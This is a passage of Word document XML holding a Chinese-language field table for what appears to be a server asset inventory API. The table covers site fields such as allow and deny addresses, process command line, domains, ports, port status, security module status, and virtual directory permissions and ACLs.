          <w:p w14:paraId="5E84BA75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24F20E32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>允许地址，仅Linux及</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5542FA88" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BBF1240" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>deny</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C2BD76D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08F43097" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AF8C8FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>拒绝地址，仅Linux及Windows-nginx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="78D2CE1F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="059219D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50F5E5D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="047EF3F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="156257E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程启动命令行参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="351804B7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A3A649C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D329D7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59D0EF65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">name: varchar(128) title：varchar(512) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F7CE2DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">域名信息列表 name：域名名称 title：标题 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：绑定</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60C04828" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75799E71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55C05D92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FD28214" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59D52383" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动服务用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4CEF37B5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B9D1221" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63CD4F88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5671028D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="487BB583" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>站点类型，如nginx，http</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="76D4179A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103901C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76062620" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64F19CF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="241FE655" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5D2DA6EC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="419A6F26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>proto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CA6D68D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0781BF96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="179F813C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A041008" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B699A8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>portStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5B05DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07FCC5AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07386840" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口状态:-1 - 端口状态未知; 0 – 仅内网可访问;1 - 外网可访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="36EC7A92" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28E7BFE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>securityEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DB9AED9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3775A1EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36D22544" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否开启安全模块 false- 未开启 true-开启 （仅Linux及Windows-nginx）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="774D02E7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2926F6DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>virtualDir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56D8CB6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56012AAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">path：varchar(1024) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>physicalPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：varchar(1024) root：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(1) owner：varchar(512) group：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">(20) permission: varchar(7) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>acls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>aceType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">(4) user: varchar(512) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">4) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accessMask:bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">(20) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: varchar(1024) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appPool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> name: varchar(512) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>identityType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(4) user: varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05CF2863" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">虚拟目录信息 path：虚拟地址 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>physicalPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：物理地址 root：是否主目录 owner：目录所有者 group：目录所属用户组 仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> permission：目录权限 仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>acls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">：仅windows </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>aceType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ace类型 user 用户名 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 用户类型 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accessMask</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 访问控制掩码数组 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: 应用程序路径 （仅Windows-IIS） </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appPool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: 程序池信息（仅Windows-IIS） name 程序池名称 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>identityType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 运行账户标识 user 运行账户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="16D362C5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="607546CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E2A6CD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C9D1379" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参考虚拟目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0100CD5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">主目录信息 path：虚拟地址 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>physicalPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：物理地址 root：是否主目录 owner：目录所有者 group：目录所属用户组 仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> permission：目录权限 仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>acls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">：仅windows </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>aceType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ace类型 user 用户名 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 用户类型 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accessMask</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 访问控制掩</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">码数组 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: 应用程序路径 （仅Windows-IIS） </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appPool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: 程序池信息（仅Windows-IIS） name 程序池名称 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>identityType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 运行账户标识 user 运行账户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="631B242C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4680EE51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>virtualDirCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B437B18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46D62BD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215C0AE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>虚拟路径数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17BF999B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2347872D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bindingCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
